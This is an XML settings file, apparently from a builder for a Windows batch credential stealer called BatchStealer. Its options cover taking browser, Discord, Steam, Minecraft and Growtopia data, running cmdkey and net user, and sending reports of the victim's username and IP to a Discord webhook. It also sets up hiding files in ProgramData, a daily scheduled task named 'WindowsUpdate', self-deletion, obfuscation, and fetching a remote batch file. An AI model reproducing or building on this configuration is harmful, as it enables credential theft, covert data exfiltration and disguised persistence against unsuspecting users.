<?xml version='1.0' encoding='utf-8'?>
<SettingsFile xmlns="http://schemas.microsoft.com/VisualStudio/2004/01/settings" CurrentProfile="(Default)" GeneratedClassNamespace="BSBuilder.Properties" GeneratedClassName="Settings">
  <Profiles />
  <Settings>
    <Setting Name="acceptTOS" Type="System.Boolean" Scope="User">
      <Value Profile="(Default)">False</Value>
    </Setting>
    <Setting Name="startadmin" Type="System.Boolean" Scope="User">
      <Value Profile="(Default)">False</Value>
    </Setting>
    <Setting Name="systeminfo" Type="System.Boolean" Scope="User">
      <Value Profile="(Default)">False</Value>
    </Setting>
    <Setting Name="tasklist" Type="System.Boolean" Scope="User">
      <Value Profile="(Default)">False</Value>
    </Setting>
    <Setting Name="netuser" Type="System.Boolean" Scope="User">
      <Value Profile="(Default)">False</Value>
    </Setting>
    <Setting Name="quser" Type="System.Boolean" Scope="User">
      <Value Profile="(Default)">False</Value>
    </Setting>
    <Setting Name="cmdkey" Type="System.Boolean" Scope="User">
      <Value Profile="(Default)">False</Value>
    </Setting>
    <Setting Name="chrome" Type="System.Boolean" Scope="User">
      <Value Profile="(Default)">False</Value>
    </Setting>
    <Setting Name="opera" Type="System.Boolean" Scope="User">
      <Value Profile="(Default)">False</Value>
    </Setting>
    <Setting Name="vivaldi" Type="System.Boolean" Scope="User">
      <Value Profile="(Default)">False</Value>
    </Setting>
    <Setting Name="firefox" Type="System.Boolean" Scope="User">
      <Value Profile="(Default)">False</Value>
    </Setting>
    <Setting Name="osu" Type="System.Boolean" Scope="User">
      <Value Profile="(Default)">False</Value>
    </Setting>
    <Setting Name="discord" Type="System.Boolean" Scope="User">
      <Value Profile="(Default)">False</Value>
    </Setting>
    <Setting Name="steam" Type="System.Boolean" Scope="User">
      <Value Profile="(Default)">False</Value>
    </Setting>
    <Setting Name="minecraft" Type="System.Boolean" Scope="User">
      <Value Profile="(Default)">False</Value>
    </Setting>
    <Setting Name="growtopia" Type="System.Boolean" Scope="User">
      <Value Profile="(Default)">False</Value>
    </Setting>
    <Setting Name="recurring" Type="System.Boolean" Scope="User">
      <Value Profile="(Default)">False</Value>
    </Setting>
    <Setting Name="selfdelete" Type="System.Boolean" Scope="User">
      <Value Profile="(Default)">False</Value>
    </Setting>
    <Setting Name="optimize" Type="System.Boolean" Scope="User">
      <Value Profile="(Default)">False</Value>
    </Setting>
    <Setting Name="obfuscate" Type="System.Boolean" Scope="User">
      <Value Profile="(Default)">False</Value>
    </Setting>
    <Setting Name="webhook" Type="System.String" Scope="User">
      <Value Profile="(Default)">https://discord.com/api/webhooks/</Value>
    </Setting>
    <Setting Name="reportstartmsg" Type="System.String" Scope="User">
      <Value Profile="(Default)">```[Report from %USERNAME% - %NetworkIP%]\nLocal time: %HH24%:%MI%```</Value>
    </Setting>
    <Setting Name="reportendmsg" Type="System.String" Scope="User">
      <Value Profile="(Default)">```Batch Scheduled: %recurring%\n[End of report]```</Value>
    </Setting>
    <Setting Name="hidepath" Type="System.String" Scope="User">
      <Value Profile="(Default)">C:\ProgramData</Value>
    </Setting>
    <Setting Name="whenscheduled" Type="System.String" Scope="User">
      <Value Profile="(Default)">Daily</Value>
    </Setting>
    <Setting Name="schedulename" Type="System.String" Scope="User">
      <Value Profile="(Default)">WindowsUpdate</Value>
    </Setting>
    <Setting Name="batchcopyname" Type="System.String" Scope="User">
      <Value Profile="(Default)">0.bat</Value>
    </Setting>
    <Setting Name="batchupdatername" Type="System.String" Scope="User">
      <Value Profile="(Default)">1.bat</Value>
    </Setting>
    <Setting Name="vbname" Type="System.String" Scope="User">
      <Value Profile="(Default)">0.vbs</Value>
    </Setting>
    <Setting Name="updateurl" Type="System.String" Scope="User">
      <Value Profile="(Default)" />
    </Setting>
    <Setting Name="targetusername" Type="System.String" Scope="User">
      <Value Profile="(Default)" />
    </Setting>
    <Setting Name="fetchurl" Type="System.String" Scope="User">
      <Value Profile="(Default)">https://raw.githubusercontent.com/Takaovi/BatchStealer/main/file.bat</Value>
    </Setting>
    <Setting Name="batchlocation" Type="System.String" Scope="User">
      <Value Profile="(Default)" />
    </Setting>
  </Settings>
</SettingsFile>